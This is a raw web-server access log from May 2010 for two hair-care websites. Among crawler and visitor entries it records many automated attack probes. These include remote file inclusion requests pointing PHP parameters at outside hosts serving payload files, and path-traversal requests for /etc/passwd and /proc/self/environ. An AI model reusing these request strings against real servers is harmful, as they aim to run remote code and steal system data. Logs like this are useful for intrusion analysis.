212.95.63.241 - - [03/May/2010:16:41:40 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Opera/8.01 (Windows NT 5.1)" "growlonghairfast.com"
184.73.63.115 - - [03/May/2010:16:42:23 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "freehairsecrets.com"
184.73.63.115 - - [03/May/2010:16:42:24 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15183 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "freehairsecrets.com"
77.88.25.28 - - [03/May/2010:16:45:12 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13449 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
119.235.237.86 - - [03/May/2010:16:51:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16913 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "growlonghairfast.com"
202.69.230.122 - - [03/May/2010:16:55:32 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.69.230.122 - - [03/May/2010:16:55:32 -0700] "GET /logs/access_100426.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:16:56:00 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13111 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
204.15.190.163 - - [03/May/2010:16:57:32 -0700] "GET /?_zb_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [03/May/2010:16:57:32 -0700] "GET /logs//?_zb_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 5090 "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [03/May/2010:16:57:32 -0700] "GET /logs/access_100125.log//?_zb_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:17:03:24 -0700] "GET /logs/access_100118.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:17:07:28 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13384 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
119.235.237.85 - - [03/May/2010:17:08:51 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16404 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "growlonghairfast.com"
93.190.138.199 - - [03/May/2010:17:10:19 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "growlonghairfast.com"
93.190.138.199 - - [03/May/2010:17:10:20 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "growlonghairfast.com"
119.235.237.93 - - [03/May/2010:17:24:41 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18806 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
77.88.25.28 - - [03/May/2010:17:27:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12881 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
208.80.193.37 - - [03/May/2010:17:28:38 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; SV1; YPC 3.2.0; .NET CLR 1.1.4322; ZangoToolbar 4.8.2; yplus 5.1.04b)" "www.freehairsecrets.com"
209.62.121.162 - - [03/May/2010:17:30:36 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://gonapus.net/chat2/2?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "growlonghairfast.com"
209.62.121.162 - - [03/May/2010:17:31:23 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://gonapus.net/chat2/2?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "growlonghairfast.com"
210.125.133.87 - - [03/May/2010:17:35:44 -0700] "GET /logs//appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.125.133.87 - - [03/May/2010:17:35:44 -0700] "GET /logs/access_100104.log%20%20//appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.125.133.87 - - [03/May/2010:17:35:44 -0700] "GET /appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:17:39:07 -0700] "GET /logs/access_100125.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
210.125.133.87 - - [03/May/2010:17:40:26 -0700] "GET /logs//appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.125.133.87 - - [03/May/2010:17:40:26 -0700] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.125.133.87 - - [03/May/2010:17:40:26 -0700] "GET /appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.125.133.87 - - [03/May/2010:17:41:31 -0700] "GET /logs//appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.125.133.87 - - [03/May/2010:17:41:31 -0700] "GET /appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.125.133.87 - - [03/May/2010:17:41:31 -0700] "GET /logs/access_100104.log%20%20//appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.125.133.87 - - [03/May/2010:17:42:05 -0700] "GET /logs//appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.125.133.87 - - [03/May/2010:17:42:05 -0700] "GET /appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.125.133.87 - - [03/May/2010:17:42:05 -0700] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [03/May/2010:17:45:59 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4804 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.195.112.151 - - [03/May/2010:17:47:50 -0700] "GET /logs/ HTTP/1.0" 200 5069 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.112.151 - - [03/May/2010:17:49:43 -0700] "GET /logs/access_100503.log HTTP/1.0" 200 2519989 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
204.236.211.159 - - [03/May/2010:17:53:02 -0700] "GET /logs/access_091207.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" "www.freehairsecrets.com"
93.190.138.199 - - [03/May/2010:18:00:20 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Opera/7.54 (Windows NT 5.1; U) [pl]" "www.freehairsecrets.com"
93.190.138.199 - - [03/May/2010:18:00:20 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Opera/7.54 (Windows NT 5.1; U) [pl]" "www.freehairsecrets.com"
77.88.25.28 - - [03/May/2010:18:01:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14270 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
119.235.237.18 - - [03/May/2010:18:03:03 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13629 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
77.221.130.10 - - [03/May/2010:18:03:04 -0700] "GET /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.10 - - [03/May/2010:18:03:04 -0700] "GET /logs/access_100426.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.10 - - [03/May/2010:18:03:04 -0700] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.10 - - [03/May/2010:18:03:18 -0700] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.10 - - [03/May/2010:18:03:18 -0700] "GET /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.10 - - [03/May/2010:18:03:18 -0700] "GET /logs/access_100426.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.10 - - [03/May/2010:18:03:53 -0700] "GET /logs/access_100426.log%20%20//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.10 - - [03/May/2010:18:04:03 -0700] "GET /logs/access_100426.log%20%20//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.hotelbeverlyhills.com.sv/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
80.71.1.68 - - [03/May/2010:18:05:14 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:18:07:07 -0700] "GET /logs/access_100111.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
80.71.1.68 - - [03/May/2010:18:09:57 -0700] "GET /logs/access_091130.log//include/print_category.php?setup[use_category]=1&dir=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
80.71.1.68 - - [03/May/2010:18:09:58 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
80.71.1.68 - - [03/May/2010:18:09:58 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.62.121.162 - - [03/May/2010:18:11:55 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://gonapus.net/chat2/2?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "growlonghairfast.com"
209.62.121.162 - - [03/May/2010:18:11:55 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://gonapus.net/chat2/2?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "growlonghairfast.com"
210.22.194.8 - - [03/May/2010:18:12:20 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
98.164.4.95 - - [03/May/2010:18:12:26 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
59.108.53.254 - - [03/May/2010:18:12:28 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
61.142.213.158 - - [03/May/2010:18:12:30 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
75.73.29.14 - - [03/May/2010:18:12:31 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
174.45.157.227 - - [03/May/2010:18:12:44 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
187.16.58.9 - - [03/May/2010:18:13:54 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
122.226.149.146 - - [03/May/2010:18:14:04 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
207.194.87.105 - - [03/May/2010:18:14:14 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:18:14:15 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13180 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
68.34.88.224 - - [03/May/2010:18:14:20 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
67.165.59.30 - - [03/May/2010:18:14:25 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
67.82.141.210 - - [03/May/2010:18:14:28 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
91.203.78.51 - - [03/May/2010:18:14:29 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
67.162.50.193 - - [03/May/2010:18:15:16 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
78.83.169.66 - - [03/May/2010:18:15:20 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
210.22.194.8 - - [03/May/2010:18:15:24 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
98.228.162.11 - - [03/May/2010:18:15:25 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
98.194.187.42 - - [03/May/2010:18:15:27 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
98.228.162.11 - - [03/May/2010:18:15:27 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
123.13.206.59 - - [03/May/2010:18:15:30 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
91.203.78.51 - - [03/May/2010:18:15:31 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
91.203.78.51 - - [03/May/2010:18:15:31 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.79 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
80.71.1.68 - - [03/May/2010:18:16:48 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
80.71.1.68 - - [03/May/2010:18:17:02 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.195.114.22 - - [03/May/2010:18:17:15 -0700] "GET /logs/access_090824.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
77.222.56.62 - - [03/May/2010:18:17:18 -0700] "GET /index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.222.56.62 - - [03/May/2010:18:18:54 -0700] "GET /logs/access.log//index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.222.56.62 - - [03/May/2010:18:18:54 -0700] "GET /index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.222.56.62 - - [03/May/2010:18:18:54 -0700] "GET /logs//index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
119.235.237.93 - - [03/May/2010:18:20:12 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12296 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
80.71.1.68 - - [03/May/2010:18:24:17 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
80.71.1.68 - - [03/May/2010:18:24:17 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
80.71.1.68 - - [03/May/2010:18:24:17 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.88.25.28 - - [03/May/2010:18:26:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15159 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
71.125.166.43 - - [03/May/2010:18:30:28 -0700] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; Trident/4.0; FBSMTWB; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Zune 4.0; yie8)" "freehairsecrets.com"
71.125.166.43 - - [03/May/2010:18:30:29 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "-" "freehairsecrets.com"
71.125.166.43 - - [03/May/2010:18:30:29 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "-" "freehairsecrets.com"
71.125.166.43 - - [03/May/2010:18:30:34 -0700] "GET /freehairsecretsphp/ HTTP/1.1" 200 349 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; Trident/4.0; FBSMTWB; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Zune 4.0; yie8)" "freehairsecrets.com"
71.125.166.43 - - [03/May/2010:18:30:35 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "-" "freehairsecrets.com"
71.125.166.43 - - [03/May/2010:18:30:35 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "-" "freehairsecrets.com"
71.125.166.43 - - [03/May/2010:18:30:38 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "-" "freehairsecrets.com"
80.71.1.68 - - [03/May/2010:18:30:38 -0700] "GET /logs/access_100419.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
71.125.166.43 - - [03/May/2010:18:30:38 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "-" "freehairsecrets.com"
80.71.1.68 - - [03/May/2010:18:30:38 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
80.71.1.68 - - [03/May/2010:18:30:38 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
71.125.166.43 - - [03/May/2010:18:30:39 -0700] "GET /tmp/ HTTP/1.1" 200 659 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; Trident/4.0; FBSMTWB; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Zune 4.0; yie8)" "freehairsecrets.com"
71.125.166.43 - - [03/May/2010:18:30:40 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "-" "freehairsecrets.com"
71.125.166.43 - - [03/May/2010:18:30:40 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "-" "freehairsecrets.com"
71.125.166.43 - - [03/May/2010:18:30:41 -0700] "GET /tmp/mailError.log HTTP/1.1" 200 62167 "http://freehairsecrets.com/tmp/" "Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; Trident/4.0; FBSMTWB; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Zune 4.0; yie8)" "freehairsecrets.com"
71.125.166.43 - - [03/May/2010:18:30:45 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "-" "freehairsecrets.com"
80.71.1.68 - - [03/May/2010:18:30:50 -0700] "GET /logs/access_100412.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.121.77.13 - - [03/May/2010:18:30:53 -0700] "GET /index.php?option=com_fabrik&controller=' HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.77.13 - - [03/May/2010:18:30:53 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
213.189.224.16 - - [03/May/2010:18:32:01 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://gonapus.net/chat2/2?? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "growlonghairfast.com"
213.189.224.16 - - [03/May/2010:18:32:01 -0700] "GET /include/bbs.lib.inc.php?site_path=http://gonapus.net/chat2/2?? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:18:32:59 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13444 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:18:37:11 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13988 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
91.121.77.13 - - [03/May/2010:18:39:02 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.77.13 - - [03/May/2010:18:39:03 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.77.13 - - [03/May/2010:18:39:03 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
67.195.112.115 - - [03/May/2010:18:39:54 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
67.195.112.115 - - [03/May/2010:18:39:55 -0700] "GET /logs/ HTTP/1.0" 200 5069 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
220.181.7.27 - - [03/May/2010:18:40:54 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
91.212.226.210 - - [03/May/2010:18:41:03 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.0 [en]" "growlonghairfast.com"
91.212.226.210 - - [03/May/2010:18:41:03 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.0 [en]" "growlonghairfast.com"
91.121.77.13 - - [03/May/2010:18:41:17 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=' HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
